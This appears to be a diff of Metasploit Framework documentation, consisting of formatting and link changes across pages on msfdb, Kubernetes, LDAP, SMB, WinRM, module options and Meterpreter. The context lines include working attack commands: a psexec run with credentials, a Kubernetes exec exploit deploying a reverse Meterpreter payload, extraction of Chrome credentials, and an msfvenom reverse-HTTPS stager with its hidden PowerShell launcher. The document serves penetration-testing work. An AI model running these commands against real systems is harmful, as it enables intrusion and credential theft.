 By default test modules in Metasploit are not loaded when Metasploit starts. To load them, run `loadpath test/modules` after which you should see output similar to the following:

-```
+```msf
 msf6 > loadpath test/modules
 Loaded 38 modules:
    14 auxiliary modules
@@ -9,4 +9,4 @@ Loaded 38 modules:
 msf6 > 
 ```

-These modules are intended to be used by developers to test updates to ensure they don't break core functionality and should not be used during normal operations. If you do happen to break the functionality of one of these modules, it is highly recommended that you look at what you are proposing within your PR and ensure that you are not accidentally breaking unintended functionality. If you do need to break certain functionality in order to add a given feature, and there is no other way to go around this, be sure to let one of the Metasploit team members know this so that appropriate updates can be made to these scripts and any associated code that may be updated by your change (assuming it is has been signed off and approved by the team).
+These modules are intended to be used by developers to test updates to ensure they don't break core functionality and should not be used during normal operations. If you do happen to break the functionality of one of these modules, it is highly recommended that you look at what you are proposing within your PR and ensure that you are not accidentally breaking unintended functionality. If you do need to break certain functionality in order to add a given feature, and there is no other way to go around this, be sure to let one of the Metasploit team members know this so that appropriate updates can be made to these scripts and any associated code that may be updated by your change (assuming it is has been signed off and approved by the team).
@@ -1,6 +1,6 @@
-Metasploit Framework 5.0 has released! 
+Metasploit Framework 5.0 has released!

-Metasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use. 
+Metasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use.

 See the release announcement [here](https://blog.rapid7.com/2019/01/10/metasploit-framework-5-0-released).

@@ -12,7 +12,7 @@ The following is a high-level overview of Metasploit 5.0's features and capabili

 * A JSON-RPC API enables users to integrate Metasploit with additional tools and languages.

-* This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services [here](https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service).
+* This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services [[here|./Metasploit-Web-Service.md]].

 * Adds `evasion` module type and libraries to let users generate evasive payloads without having to install external tools. Read the research underpinning evasion modules [here](https://www.rapid7.com/info/encapsulating-antivirus-av-evasion-techniques-in-metasploit-framework). Rapid7's first evasion modules are [here](https://github.com/rapid7/metasploit-framework/pull/10759).

@@ -28,6 +28,6 @@ The following is a high-level overview of Metasploit 5.0's features and capabili

 You can get Metasploit 5.0 by checking out the [5.0.0 tag](https://github.com/rapid7/metasploit-framework/releases/tag/5.0.0) in the Metasploit GitHub project.

-Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://github.com/rapid7/metasploit-framework/wiki), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend. 
+Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://docs.metasploit.com/), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend.

 See all the ways to stay informed and get involved at <https://metasploit.com>.
@@ -22,7 +22,7 @@ Metasploit 6 adds support for SMB client connections using the version 3 dialect

 While many modules were updated to use the RubySMB SMB 3 implementation, not all were updated. Notably many older exploits that pre-date the release of SMB 3 were not updated and continue to use the original Rex implementation of the protocol. For those modules that have been updated however, users will be able to use them without any changes to their work flow. By default the newest dialect will be negotiated with the remote server and if it is one of the dialects within version 3 that supports encryption, the framework will use encryption by default. Users can alter this behavior by setting the `SMB::AlwaysEncrypt` and `SMB::ProtocolVersion` options. `SMB::AlwaysEncrypt` enforces encryption for SMB 3 connections even when the server does not require it (defaults to: `true`) while `SMB::ProtocolVersion` is a comma separated list of versions to allow the framework to negotiate (default: `1,2,3`).

-Module authors looking to write SMB modules should note the move towards the [RubySMB](https://github.com/rapid7/ruby_smb) protocol stack instead of the legacy Rex implementation. Much of the functionality is standardized within the [mixins](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/exploit/smb) however some edge-case functionality must still be ported over to RubySMB. For information on writing modules target SMB for Metasploit, see [Guidelines for Writing Modules with SMB](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Writing-Modules-with-SMB).
+Module authors looking to write SMB modules should note the move towards the [RubySMB](https://github.com/rapid7/ruby_smb) protocol stack instead of the legacy Rex implementation. Much of the functionality is standardized within the [mixins](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/exploit/smb) however some edge-case functionality must still be ported over to RubySMB. For information on writing modules target SMB for Metasploit, see [[Guidelines for Writing Modules with SMB|./Guidelines-for-Writing-Modules-with-SMB.md]].

 ## Pull Requests

@@ -48,6 +48,6 @@ A complete list of pull requests included as part of the initial version 6 work:

 You can get Metasploit 6.0 by checking out the [6.0.0 tag](https://github.com/rapid7/metasploit-framework/releases/tag/6.0.0) in the Metasploit GitHub project.

-Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://github.com/rapid7/metasploit-framework/wiki), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend. 
+Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://docs.metasploit.com/), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend.

 See all the ways to stay informed and get involved at <https://metasploit.com>.
@@ -30,7 +30,7 @@ Our solution to this is a data service proxy.  A data service proxy allows us to
 Currently we plan to support the legacy data storage technology stack (RAILS/PostgreSQL) which we hope to eventually phase out.  The new implementation will use a RESTful (https://en.wikipedia.org/wiki/Representational_state_transfer) approach whereby calls to `framework.db` can be proxied to a remote web service that supports the same data service API.  We have built a web service that runs atop the current data storage service for the community.

 This approach enables us to:
-* More easily enhance the metasploit data model
+* More easily enhance the Metasploit data model
 * Run a web-based data service independent of the Metasploit Framework
    * Reduces the memory used by a Metasploit Framework instance using a data service by no longer requiring a DB client
    *  Increases throughput as storage calls don't necessarily need to be asynchronous
@@ -41,4 +41,4 @@ This approach enables us to:

 ## Usage

-For more information on setting up the web service and using the data services see [Metasploit Web Service](https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service).
+For more information on setting up the web service and using the data services see [[Metasploit Web Service|./Metasploit-Web-Service.md]].
@@ -1,22 +1,22 @@
 ## What is msfdb?
 msfdb is a script included with all installations of Metasploit that allows you to easily setup and control both a database and a Web Service capable of connecting this database with Metasploit.

-While msfdb is the simplest method for setting up a database, you can also set one up manually. Instructions on manual setup can be found [here](https://metasploit.help.rapid7.com/docs/managing-the-database). 
+While msfdb is the simplest method for setting up a database, you can also set one up manually. Instructions on manual setup can be found [here](https://metasploit.help.rapid7.com/docs/managing-the-database).

 ## Why should I use msfdb?
-It's not mandatory to use a database with Metasploit, it can run perfectly fine without one. However, a lot of the features that makes Metasploit so great require a database, and msfdb is the simplest way to setup a Metasploit compatible database. 
+It's not mandatory to use a database with Metasploit, it can run perfectly fine without one. However, a lot of the features that makes Metasploit so great require a database, and msfdb is the simplest way to setup a Metasploit compatible database.

 The Metasploit features that require a connected database include:
 * Recording other machines on a network that are found with a nmap scan via the `db_nmap` command are stored as "Hosts".
  * Hosts can be viewed with the `hosts` command
-* Storing credentials successfully extracted by exploits are stored as "creds". 
+* Storing credentials successfully extracted by exploits are stored as "creds".
  * Credentials are viewed with the `creds` command.
-* Keeping track of successful exploitation attempts are recorded as "Vulnerabilities". 
+* Keeping track of successful exploitation attempts are recorded as "Vulnerabilities".
  * Successful exploitations can be viewed with the `vulns` command.
-  * The `vulns` command also tracks unsuccessful exploitation attempts 
+  * The `vulns` command also tracks unsuccessful exploitation attempts
 * Storing services detected on remote hosts by `db_nmap` are recorded as "Services"
  * Remote services are viewed with the `services` command
-* Tracking multiple remote sessions opened by exploit payloads 
+* Tracking multiple remote sessions opened by exploit payloads
  * These sessions can be managed and tracked with the `sessions` command.
 * Storing any difficult to define information returned by successful exploits as "Loot"
  * Viewable with the `loot` command
@@ -62,7 +62,7 @@ Generating SSL key and certificate for MSF web service
 Attempting to start MSF web service...success
 MSF web service started and online
 Creating MSF web service user your_current_account_name
- 
+
    ############################################################
    ##              MSF Web Service Credentials               ##
    ##                                                        ##
@@ -77,15 +77,15 @@ MSF web service user API token: super_secret_api_token

 MSF web service configuration complete
 The web service has been configured as your default data service in msfconsole with the name "local-https-data-service"
- 
+
 If needed, manually reconnect to the data service in msfconsole using the command:
 db_connect --token super_secret_api_token --cert /Users/your_current_account_name/.msf4/msf-ws-cert.pem --skip-verify https://localhost:5443
- 
+
 The username and password are credentials for the API account:
 https://localhost:5443/api/v1/auth/account
 ```

-Again, this is a lot of information to process, but it's not nearly as complicated as it looks. The Username, Password, and API token used to connect to the Web Service is displayed: 
+Again, this is a lot of information to process, but it's not nearly as complicated as it looks. The Username, Password, and API token used to connect to the Web Service is displayed:

 ```
 MSF web service username: your_current_account_name
@@ -93,7 +93,7 @@ MSF web service password: super_secret_password
 MSF web service user API token: super_secret_api_token
 ```

-Followed by instructions on how to connect to your database with Metasploit via the Web Service: 
+Followed by instructions on how to connect to your database with Metasploit via the Web Service:

 ```
 If needed, manually reconnect to the data service in msfconsole using the command:
@@ -109,23 +109,23 @@ https://localhost:5443/api/v1/auth/account

 All this information is loaded by Metasploit automatically at startup from the ~/.msf4 folder. You should copy the credentials to a file in case you need them in the future. If you forget or lose the credentials but you can always run `./msfdb reinit` and reset the Web Service authentication details. **Just make sure to say no to the prompt asking you if you want to delete the Database contents!**

-## msfdb commands  
+## msfdb commands

 The commands for msfdb are as follows:
-*   `./msfdb init`     Creates and begins execution of a database & web service. Additional prompts displayed after this command is executed allows optional configuration of both the username and the password used to connect to the database via the web service. Web service usernames and passwords can be set to a default value, or a value of the users choice. 
-*   `./msfdb delete`   Deletes the web service and database configuration files. You will also be prompted to delete the database's contents, but this is not mandatory.  
+*   `./msfdb init`     Creates and begins execution of a database & web service. Additional prompts displayed after this command is executed allows optional configuration of both the username and the password used to connect to the database via the web service. Web service usernames and passwords can be set to a default value, or a value of the users choice.
+*   `./msfdb delete`   Deletes the web service and database configuration files. You will also be prompted to delete the database's contents, but this is not mandatory.
 *   `./msfdb reinit`   The same as running `./msfdb delete` followed immediately by `./msfdb init`.
-*   `./msfdb status`   Displays if the database & web service are currently active. If the database is active it displays the path to its location. If the web service is active, the Process ID it has been assigned will be displayed. 
+*   `./msfdb status`   Displays if the database & web service are currently active. If the database is active it displays the path to its location. If the web service is active, the Process ID it has been assigned will be displayed.
 *   `./msfdb start`    Start the database & web service.
-*   `./msfdb stop`     Stop the database & web service. 
+*   `./msfdb stop`     Stop the database & web service.
 *   `./msfdb restart`  The same as running `./msfdb stop` followed immediately by `./msfdb start`.

 ## msfdb errors

-In the case of any of the above commands printing either a stack trace or error, your first step should be to run `./msfdb reinit` (again making sure to say no to the prompt asking you if you want to delete the Database contents) and reattempt the command that caused the error. If the error persists, copy the command you executed, the output generated, and paste it into an [error ticket](https://github.com/rapid7/metasploit-framework/issues/new/choose). 
+In the case of any of the above commands printing either a stack trace or error, your first step should be to run `./msfdb reinit` (again making sure to say no to the prompt asking you if you want to delete the Database contents) and reattempt the command that caused the error. If the error persists, copy the command you executed, the output generated, and paste it into an [error ticket](https://github.com/rapid7/metasploit-framework/issues/new/choose).

 ## What's next?
-That's it for the simple high level explanation of how to setup a database for metasploit. If that wasn't enough detail for you you can check out our more in depth explanation [here](https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service).
+That's it for the simple high level explanation of how to setup a database for metasploit. If that wasn't enough detail for you you can check out our more in depth explanation [[here|./Metasploit-Web-Service.md]].

 If you want to get started hacking but don't know how to, here are a few guides we really like:
 * [The easiest metasploit guide you'll ever read](https://www.exploit-db.com/docs/english/44040-the-easiest-metasploit-guide-you%E2%80%99ll-ever-read.pdf) - A great, easy to follow guide on how to set up Metasploit and Metasploitable (Our intentionally vulnerable Linux virtual machine used to for security training) for VMs. Also has a fantastic guide on penetration testing Metasploitable 2, from information gathering right up to exploitation.
@@ -10,7 +10,7 @@ Note that any port can be used to run an application which communicates via HTTP

 This document is generic advice for running and debugging HTTP based Metasploit modules, but it is best to use a Metasploit module which is specific to the application that you are pentesting. For instance:

-```
+```msf
 msf6 > search tomcat http
 ```

@@ -48,7 +48,7 @@ run http://example.com HttpTrace=true verbose=true

 For instance:

-```
+```msf
 msf6 > use scanner/http/title
 msf6 auxiliary(scanner/http/title) > set RHOSTS 127.0.0.1
 RHOSTS => 127.0.0.1
@@ -8,7 +8,7 @@ a compromised docker container, or external to the cluster if the required APIs

 In the future there may be more modules than listed here, for the full list of modules run the `search` command within msfconsole:

-```
+```msf
 msf6 > search kubernetes
 ```

@@ -40,7 +40,7 @@ run session=-1

 If the Kubernetes API is publicly accessible and you have a JWT Token:

-```
+```msf
 msf6 > use cloud/kubernetes/enum_kubernetes
 msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set RHOST https://kubernetes.docker.internal:6443
 RHOST => https://kubernetes.docker.internal:6443
@@ -67,7 +67,7 @@ Namespaces

 By default the `run` command will enumerate all resources available, but you can also specify which actions you would like to perform:

-```
+```msf
 msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show actions

 Auxiliary actions:
@@ -114,7 +114,7 @@ The `exploit/multi/kubernetes/exec` module will attempt to create a new pod in t
 If you have a Meterpreter session on a compromised Kubernetes container with the available permissions, the module values of `NAMESPACE`, `TOKEN`, `RHOSTS` and `RPORT` module options
 will be gathered from the session host automatically. The `TOKEN` will be read from the mounted `/run/secrets/kubernetes.io/serviceaccount/token` file if available:

-```
+```msf
 msf6 exploit(multi/kubernetes/exec) > set TARGET Interactive\ WebSocket
 TARGET => Interactive WebSocket
 msf6 exploit(multi/kubernetes/exec) > run RHOST="" RPORT="" POD="" SESSION=-1
@@ -136,7 +136,7 @@ pwd

 If the Kubernetes API is available remotely, the RHOST values and token can be set manually. In this scenario a token is manually specified, to execute a Python Meterpreter payload within the `thinkphp-67f7c88cc9-tgpfh` pod:

-```
+```msf
 msf6 > use exploit/multi/kubernetes/exec
 [*] Using configured payload python/meterpreter/reverse_tcp
 msf6 exploit(multi/kubernetes/exec) > set TOKEN eyJhbGciOiJSUzI1...
@@ -1,7 +1,7 @@
 ## LDAP Workflows

 Lightweight Directory Access Protocol (LDAP) is a method for obtaining distributed directory information from a service.
-For Windows Active Directory environments this is a useful method of enumerating users, computers, misconfigurations, etc. 
+For Windows Active Directory environments this is a useful method of enumerating users, computers, misconfigurations, etc.

 LDAP on Windows environments are found on:

@@ -36,7 +36,7 @@ run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd a

 Example output:

-```
+```msf
 msf6 auxiliary(gather/ldap_query) > run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
 [*] Running module against 192.168.123.13

@@ -56,6 +56,7 @@ CN=Administrator CN=Users DC=domain DC=local
                     | CN=Enterprise Admins,CN=Users,DC=domain,DC=local || CN=Schema Admins,CN=Users,DC=domain,DC=local || CN=Adm
                     inistrators,CN=Builtin,DC=domain,DC=local
 name                Administrator
+ objectsid           S-1-5-21-3402587289-1488798532-3618296993-500
 pwdlastset          133189448681297271
 samaccountname      Administrator
 useraccountcontrol  512
@@ -66,8 +67,8 @@ CN=Administrator CN=Users DC=domain DC=local
 This module has a selection of inbuilt queries which can be configured via the `action` setting to make enumeration easier:

 - `ENUM_ACCOUNTS` - Dump info about all known user accounts in the domain.
- `ENUM_ADCS_CAS` - Enumerate ADCS certificate authorities.
- `ENUM_ADCS_CERT_TEMPLATES` - Enumerate ADCS certificate templates.
+- `ENUM_AD_CS_CAS` - Enumerate AD CS certificate authorities.
+- `ENUM_AD_CS_CERT_TEMPLATES` - Enumerate AD CS certificate templates.
 - `ENUM_ADMIN_OBJECTS` - Dump info about all objects with protected ACLs (i.e highly privileged objects).
 - `ENUM_ALL_OBJECT_CATEGORY` - Dump all objects containing any objectCategory field.
 - `ENUM_ALL_OBJECT_CLASS` - Dump all objects containing any objectClass field.
@@ -75,6 +76,7 @@ This module has a selection of inbuilt queries which can be configured via the `
 - `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow contrained delegation.
 - `ENUM_DNS_RECORDS` - Dump info about DNS records the server knows about using the dnsNode object class.
 - `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This isneeded - as without this BASEDN prefix we often miss certain entries.
+- `ENUM_DOMAIN` - Dump info about the Active Directory domain.
 - `ENUM_DOMAIN_CONTROLLERS` - Dump all known domain controllers.
 - `ENUM_EXCHANGE_RECIPIENTS` - Dump info about all known Exchange recipients.
 - `ENUM_EXCHANGE_SERVERS` - Dump info about all known Exchange servers.
@@ -84,6 +86,7 @@ This module has a selection of inbuilt queries which can be configured via the `
 - `ENUM_HOSTNAMES` - Dump info about all known hostnames in the LDAP environment.
 - `ENUM_LAPS_PASSWORDS` - Dump info about computers that have LAPS enabled, and passwords for them if available.
 - `ENUM_LDAP_SERVER_METADATA` - Dump metadata about the setup of the domain.
+- `ENUM_MACHINE_ACCOUNT_QUOTA` - Dump the number of computer accounts a user is allowed to create in a domain.
 - `ENUM_ORGROLES` - Dump info about all known organization roles in the LDAP environment.
 - `ENUM_ORGUNITS` - Dump info about all known organizational units in the LDAP environment.
 - `ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow uncontrained delegation.
@@ -100,7 +103,7 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi

 Query LDAP for accounts:

-```
+```msf
 msf6 > use auxiliary/gather/ldap_query
 msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
 [*] Running module against 192.168.123.13
@@ -113,7 +116,7 @@ msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.1
 [*] Discovering base DN automatically
 [+] 192.168.123.13:389 Discovered base DN: DC=domain,DC=local
 CN=Administrator CN=Users DC=domain DC=local
-==========================================
+============================================

 Name                Attributes
 ----                ----------
@@ -41,7 +41,7 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi

 Connect to a Microsoft SQL Server instance and run a query:

-```
+```msf
 msf6 > use auxiliary/admin/mssql/mssql_sql
 msf6 auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
 [*] Reloading module...
@@ -13,7 +13,7 @@ Metasploit has support for multiple MySQL modules, including:

 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

-```
+```msf
 msf6 > search mysql
 ```

@@ -6,7 +6,7 @@ Metasploit post modules replace old Meterpreter scripts, which are no longer mai

 You can search for post gather modules within msfconsole:

-```
+```msf
 msf6 > search type:post platform:windows name:gather

 Matching Modules
@@ -25,7 +25,7 @@ There are two ways to launch a Post module, both require an existing session.

 Within a msf prompt you can use the `use` comand followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:

-```
+```msf
 msf6 > use post/windows/gather/enum_chrome
 msf6 post(windows/gather/enum_chrome) > run session=-1 verbose=true

@@ -49,7 +49,7 @@ msf6 post(windows/gather/enum_chrome) >

 Or within a Meterpreter prompt use the `run` command, which will automatically set the module's session value:

-```
+```msf
 msf6 > sessions --interact -1
 [*] Starting interaction with 5...

@@ -13,7 +13,7 @@ Metasploit has support for multiple PostgreSQL modules, including:

 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

-```
+```msf
 msf6 > search postgres
 ```

@@ -97,7 +97,7 @@ psql postgres://postgres:mysecretpassword@localhost:5432

 Metasploit's output will be:

-```
+```msf
 msf6 auxiliary(server/capture/postgresql) >
 [*] Started service listener on 0.0.0.0:5432
 [*] Server started.
@@ -23,7 +23,7 @@ Metasploit has support for multiple SMB modules, including:

 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

-```
+```msf
 msf6 > search mysql
 ```

@@ -192,7 +192,7 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi

 Running psexec against a host:

-```
+```msf
 msf6 > use exploit/windows/smb/psexec
 msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local

@@ -11,7 +11,7 @@ Metasploit has support for multiple SSH modules, including:

 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

-```
+```msf
 msf6 > search ssh
 ```

@@ -60,7 +60,7 @@ docker run --rm -it --publish 127.0.0.1:2222:22 ssh_lab:latest

 It should now be possible to test the SSH login from msfconsole:

-```
+```msf
 msf6 > use scanner/ssh/ssh_login
 msf6 auxiliary(scanner/ssh/ssh_login) > run ssh://test_user:password123@127.0.0.1:2222

@@ -2,14 +2,14 @@

 Each Metasploit module has a set of options which must be set before running. These can be seen with the `show options` or `options` command:

-```
+```msf
 msf6 exploit(windows/smb/ms17_010_eternalblue) > options

 Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
-   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
@@ -35,7 +35,7 @@ Exploit target:

 Each Metasploit module also has _advanced_ options, which can often be useful for fine-tuning modules, in particular setting connection timeouts values can be useful:

-```
+```msf
 msf6 exploit(windows/smb/ms17_010_eternalblue) > advanced

 Module advanced options (exploit/windows/smb/ms17_010_eternalblue):
@@ -60,14 +60,14 @@ Payload advanced options (windows/x64/meterpreter/reverse_tcp):

 You can see which options stilloptions to be set with the `show missing` command:

-```
+```msf
 msf6 exploit(windows/smb/ms17_010_eternalblue) > show missing

 Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
-   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
 ```

 ### Setting options
@@ -102,6 +102,12 @@ use exploit/linux/postgres/postgres_payload
 run postgres://postgres:password@192.168.123.6 lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\ x86_64' verbose=true
 ```

+You can set complex options using quotes. Example:
+
+```
+set COMMAND "date --date='TZ=\"America/Los_Angeles\" 09:00 next Fri' --iso-8601=ns"
+```
+
 ### URI support for RHOSTS

 Metasploit also supports the use of [URI](https://en.wikipedia.org/wiki/Uniform_Resource_Identifier) strings as arguments,
@@ -40,7 +40,7 @@ Metasploit has support for multiple WinRM modules, including:

 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

-```
+```msf
 msf6 > search winrm
 ```

@@ -69,7 +69,7 @@ run https://192.168.123.139:5986

 Example:

-```
+```msf
 msf6 auxiliary(scanner/winrm/winrm_auth_methods) > run http://192.168.123.139:5985

 [+] 192.168.123.139:5985: Negotiate protocol supported
@@ -122,7 +122,7 @@ run http://user:pass@192.168.123.139:5985

 Example:

-```
+```msf
 msf6 auxiliary(scanner/winrm/winrm_login) > run http://user:pass@192.168.123.139:5985

 [!] No active DB -- Credential data will not be saved!
@@ -145,7 +145,7 @@ Details on the Kerberos specific option names are documented in [[Kerberos Servi

 Open a WinRM session:

-```
+```msf
 msf6 > use auxiliary/scanner/winrm/winrm_login
 msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd win::rmauth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local

@@ -60,7 +60,7 @@ When the user views the options for a given module, it will be consolidated. The

 Multiple options are available for configuring the module options:

-```
+```msf
 msf5 exploit(multi/http/tomcat_mgr_upload) > options

 Module options (exploit/multi/http/tomcat_mgr_upload):
@@ -87,7 +87,7 @@ Exploit target:

 Multiple options are consolidated into a single TARGETS field:

-```
+```msf
 msf5 exploit(multi/http/tomcat_mgr_upload) > options

 Module options (exploit/multi/http/tomcat_mgr_upload):
@@ -598,4 +598,4 @@ HTTP[S] Options:
  **Host              True        http://10.10.14.31:1234          Hostname/IP for staging.**
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  **Port              True        1234                             Port for the listener.**
-```
+```
@@ -71,8 +71,8 @@ The notion of a session configuration block is used to wrap up the following val

 * **Socket handle** - When Meterpreter is invoked with TCP communications, an active socket is already in use. This socket handle is intended to be reused by Meterpreter when `metsrv` executes. This socket handle is written to the configuration block on the fly by the loader. It is stored in the Session configuration block so that it has a known location. This value is always a 32-bit DWORD, even on 64-bit platforms.
 * **Exit func** - This value is a 32-bit DWORD value that identifies the method that should be used when terminating the Meterpreter session. This value is the equivalent of the [Block API Hash](https://github.com/rapid7/rex-text/blob/0e3b7d3246f9db257465f385f21d6e5385d85212/lib/rex/text/block_api.rb#L16) that represents the function to be invoked. Meterpreter used to delegate the responsibility of handling this to the stager that had invoked it. Meterpreter no longer does this, instead, it handles the closing of the Meterpreter session by itself, and hence the chosen method for termination must be made known in the configuration.
-* **Session expiry value** - This is a 32-bit DWORD that contains the number of seconds that the Meterpreter session should last for. While Meterpreter is running, this value is continually checked, and if the session expiry time is reached, then Meterpreter shuts itself down. For more information, please read [Meterpreter Timeout Control](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Timeout-Control).
-* **UUID** - This is a 16-byte value that represents a payload UUID. A UUID is a new concept that has come to Metasploit with a goal of tracking payload type and origin, and validating that sessions received by Metasploit are intended for use by the current installation. For more information, please read [Payload UUID](https://github.com/rapid7/metasploit-framework/wiki/Payload-UUID).
+* **Session expiry value** - This is a 32-bit DWORD that contains the number of seconds that the Meterpreter session should last for. While Meterpreter is running, this value is continually checked, and if the session expiry time is reached, then Meterpreter shuts itself down. For more information, please read [[Meterpreter Timeout Control|./Meterpreter-Timeout-Control.md]].
+* **UUID** - This is a 16-byte value that represents a payload UUID. A UUID is a new concept that has come to Metasploit with a goal of tracking payload type and origin, and validating that sessions received by Metasploit are intended for use by the current installation. For more information, please read [[Payload UUID|./Payload-UUID.md]].

 The layout of this block in memory looks like this:

@@ -7,7 +7,7 @@ There are currently two main ways to debug Meterpreter sessions:

 This can be enabled for any Meterpreter session, and does not require a debug Metasploit build:

-```
+```msf
 msf6 > setg SessionTlvLogging true
 SessionTlvLogging => true
 ```
@@ -108,4 +108,4 @@ to_handler

 ### Java

-Functionality not supported
+Functionality not supported
@@ -14,12 +14,12 @@ rm -f www.example.com.key  www.example.com.crt

 ### Create a Paranoid Payload

-For this use case, we will combine [[Payload UUID]] tracking and whitelisting with [TLS pinning](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-HTTP-Communication#tls-certificate-pinning). For a staged payload, we will use the following command:
+For this use case, we will combine [[Payload UUID]] tracking and whitelisting with [[TLS pinning|./Meterpreter-HTTP-Communication.md]]. For a staged payload, we will use the following command:

 ```
 $ ./msfvenom -p windows/meterpreter/reverse_winhttps LHOST=www.example.com LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./www.example.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o launch-paranoid.bat

-$ head launch-paranoid.bat 
+$ head launch-paranoid.bat
 %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcg...
 ```

@@ -61,7 +61,7 @@ meterpreter > reg enumkey -k HKCU\\Keyboard Layout
 The result of your registry queries can be impacted if you are interacting with a x86 or x64 Windows session.
 You can see the type of session you currently have open with the `sessions` command:

-```
+```msf
 msf6 exploit(windows/smb/psexec) > sessions

 Active sessions
@@ -2,9 +2,9 @@ Of the many recent changes to Meterpreter, reliable network communication is one

 In the case of HTTP/S transports, some resiliency features were present. Thanks to its stateless nature, HTTP/S transports would continue to attempt to talk to Metasploit after network outages or other unexpected problems as each command request/response is transmitted over a fresh connection. TCP based transports had nothing that would attempt to reconnect should some kind of network issue occur.

-Revamped [transport](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control) implementations have provided support for resiliency even for TCP based communcations. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.
+Revamped [[transport|./Meterpreter-Transport-Control.md]] implementations have provided support for resiliency even for TCP based communcations. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.

-It is also possible to control the behaviour of this functionality a little via the use of the various timeout values that can be specified when adding transports to the session, and also on the fly for the current transport. For full details, please see the [timeout documentation](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Timeout-Control) for details on those timeout values.
+It is also possible to control the behaviour of this functionality a little via the use of the various timeout values that can be specified when adding transports to the session, and also on the fly for the current transport. For full details, please see the [[timeout documentation|./Meterpreter-Timeout-Control.md]] for details on those timeout values.

